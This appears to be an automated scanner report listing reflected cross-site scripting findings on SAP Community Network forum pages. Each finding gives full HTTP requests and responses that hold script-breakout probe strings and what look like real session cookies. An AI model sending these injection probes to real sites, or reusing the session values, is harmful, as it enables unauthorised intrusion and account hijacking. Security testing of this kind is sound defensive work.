SDN_FORUM: 53
SDN_CATEGORY: 2
SDN_THREAD: 2072047
SDN_MESSAGE: 10787731
Content-Length: 26941
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:44:04 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: SAP Por
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/style/style.jsp?a6382"><a>e34da4ea807=1&amp;threadID=2072047" />
...[SNIP]...

1.12. http://forums.sdn.sap.com/thread.jspa [threadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ebb22</script>fe58fc0f1fc was submitted in the threadID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=2072047ebb22</script>fe58fc0f1fc HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://forums.sdn.sap.com/thread.jspa?threadID=2072047
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums400.sdn.sap.com%2fthread.jspa%3fthreadID%3d480818; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215159759%3B%20pe%3Dno%2520value%7C1321215159763%3B%20c3%3Dno%2520value%7C1321215159767%3B%20s_nr%3D1321213359777-Returning%7C1323805359777%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813359780%3B%20s_visit%3D1%7C1321215159782%3B%20gpv_p47%3Dno%2520value%7C1321215159787%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B; saplb_*=(J2EE4806200)4806250; JSESSIONID=(J2EE4806200)ID0839353050DB02501609907619194126End; SDNSTATE_FRM=2539917484.14340.0000

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3NTJFMDItQTFDRTZGNDkwMDM4QTEzNg==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8682
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:43:59 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...

   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=2072047ebb22</script>fe58fc0f1fc";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.13. http://forums.sdn.sap.com/thread.jspa [threadID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the threadID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f181</script><a>eb754f6e0b3 was submitted in the threadID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=20720473f181</script><a>eb754f6e0b3 HTTP/1.1
Host: forums.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEAQFjAD&url=http%3A%2F%2Fforums.sdn.sap.com%2Fthread.jspa%3FthreadID%3D2072047&ei=2B3ATpv9N5PSiAL9tLyyAw&usg=AFQjCNEl9qnvLkGujrH2Uevfr_w1i_a6oQ
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums400.sdn.sap.com%2fthread.jspa%3fthreadID%3d480818; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1321215159759%3B%20pe%3Dno%2520value%7C1321215159763%3B%20c3%3Dno%2520value%7C1321215159767%3B%20s_nr%3D1321213359777-Returning%7C1323805359777%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813359780%3B%20s_visit%3D1%7C1321215159782%3B%20gpv_p47%3Dno%2520value%7C1321215159787%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0OTctMTMzOUU3NTI3ODQtQUJEMTVGQTU2MEFEMDdEMQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8713
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:43:57 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: Not Fou
...[SNIP]...

   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=20720473f181</script><a>eb754f6e0b3";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.14. http://forums400.sdn.sap.com/thread.jspa [9751ab?xss parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums400.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the 9751ab?xss request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 938be</script><a>69597fa3541 was submitted in the 9751ab?xss parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=480818&9751ab?xss=1938be</script><a>69597fa3541 HTTP/1.1
Host: forums400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE6388200)6388250; JSESSIONID=(J2EE6388200)ID1832374650DB01501907970351667015End; SDNSTATE_FRM=761532588.14340.0000; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn%2flogon%3fredirect%3dhttp%3a%2f%2fforums.sdn.sap.com%3a80%2fmessage.jspa%3fmessageID%3d7893915; mbox=check#true#1321213576|session#1321213478215-608827#1321215376; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%253Alogon%7C1321215316005%3B%20pe%3Dno%2520value%7C1321215316010%3B%20c3%3Dno%2520value%7C1321215316013%3B%20s_nr%3D1321213516024-Returning%7C1323805516024%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813516029%3B%20s_visit%3D1%7C1321215316030%3B%20gpv_p47%3Dno%2520value%7C1321215316034%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3D%3B; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MkQtMTMzOUU3Q0FBNUQtNUU4RTVENDkxQzQwMUUzRQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 41
SDN_CATEGORY: 2
SDN_THREAD: 480818
SDN_MESSAGE: 3770439
Content-Length: 114433
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:52:10 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: ESS Lea
...[SNIP]...
lo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9751ab?xss=1938be</script><a>69597fa3541";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.15. http://forums400.sdn.sap.com/thread.jspa [9c165%3C/script%3E%3Ca%3E35be9e751ab parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums400.sdn.sap.com
Path:   /thread.jspa

Issue detail

The value of the 9c165%3C/script%3E%3Ca%3E35be9e751ab request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2cb5</script><a>d2dfd37ff4c was submitted in the 9c165%3C/script%3E%3Ca%3E35be9e751ab parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=480818&9c165%3C/script%3E%3Ca%3E35be9e751ab=1d2cb5</script><a>d2dfd37ff4c HTTP/1.1
Host: forums400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: */*
Referer: http://forums400.sdn.sap.com/thread.jspa?threadID=480818&9c165%3C/script%3E%3Ca%3E35be9e751ab=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; saplb_*=(J2EE6388200)6388250; JSESSIONID=(J2EE6388200)ID1832374650DB01501907970351667015End; SDNSTATE_FRM=761532588.14340.0000; __utmb=198376301; __utmc=198376301; __utma=198376301.1725460367.1321213479.1321213479.1321213479.1; __utmz=198376301.1321213485.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fsdn%2flogon%3fredirect%3dhttp%3a%2f%2fforums.sdn.sap.com%3a80%2fmessage.jspa%3fmessageID%3d7893915; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; mbox=check#true#1321213576|session#1321213478215-608827#1321215376; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Asdn%253Alogon%7C1321215316005%3B%20pe%3Dno%2520value%7C1321215316010%3B%20c3%3Dno%2520value%7C1321215316013%3B%20s_nr%3D1321213516024-Returning%7C1323805516024%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1450813516029%3B%20s_visit%3D1%7C1321215316030%3B%20gpv_p47%3Dno%2520value%7C1321215316034%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D6%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MkQtMTMzOUU3QzhDMzItN0Y1REM5MEI0M0QyRjVGQQ==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 41
SDN_CATEGORY: 2
SDN_THREAD: 480818
SDN_MESSAGE: 3770439
Content-Length: 116203
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:52:03 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: ESS Lea
...[SNIP]...
prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165%3C/script%3E%3Ca%3E35be9e751ab=1d2cb5</script><a>d2dfd37ff4c";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.16. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums400.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c165</script><a>35be9e751ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /thread.jspa?threadID=480818&9c165</script><a>35be9e751ab=1 HTTP/1.1
Host: forums400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search400.sap.com/ui/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MkQtMTMzOUU3NTExQjAtRUE3N0ZDQkYyRjZGNzYxNA==
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
SDN_FORUM: 41
SDN_CATEGORY: 2
SDN_THREAD: 480818
SDN_MESSAGE: 3770439
Content-Length: 113775
Vary: Accept-Encoding
Date: Sun, 13 Nov 2011 19:43:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>
   <!-- SDN Forums generated page -->
       <title>SAP Community Network Forums: ESS Lea
...[SNIP]...

   s.prop5="glo"
   s.prop6="visitor"
   s.prop9="logN"
   if(typeof pnf != "undefined") {
       s.pageType=pnf;
       s.prop27=selfLocation.substring(0, selfLocation.indexOf('/', 8)) + "/thread.jspa?threadID=480818&9c165</script><a>35be9e751ab=1";
   }
/* END CUSTOM CODING */
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
   var s_code=s.t()
   if(s_code)document.write(s_code)
} catch (e) {}
//-->
...[SNIP]...

1.17. http://forums400.sdn.sap.com/thread.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://forums400.sdn.sap.com
Path:   /thread.jspa

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf17f"><a>fda93e2b7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /thread.jspa?threadID=480818&cf17f"><a>fda93e2b7c0=1 HTTP/1.1
Host: forums400.sdn.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://search400.sap.com/ui/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Unique=QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; session=52383e4a-d615-4153-a2b4-311fe768b4c7; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; NPC_CPS_SESSION=xxxxxx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fstore%2fbobjamer%2fen_US%2fDisplayCategoryListPage%26categoryID%3d54721500; ecomssid=9e058b05fca36645a7e1ab7412f0a6ac; UsersDefaultCountry=US; UsersDefaultLanguage=EN; ecomguid=e3bb7cf5-0f27-0664-0d80-59dcb5447048; SingleSignOnEvent=51a3d747-8c02-417d-8f96-ae6e0ddd405d|TrainingCertification; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-QUERYSTRINGFIELD=; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2ftraining-certification%2fregister.epx%3fkNtBzmUK9zU; SAP.SITE.COOKIE=cmpgn.code=CRM-AP09-IND-SRMQ2ANZ&cmpn=CRM-AP09-IND-SRMQ2ANZ; SAP_SCORING_COOKIE=SOLUTION=BARB001001,9|SOLUTION=BARB003001,9|INDUSTRY=INDA000011,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|; CMPFIELDCRM-AP09-IND-SRMQ2ANZ-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=True&InquiryType=Campaign&InquiryLevel=Premium&Segment=LE; client=6ed3d8c3-34dc-b9f4-1124-005f785589fd; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
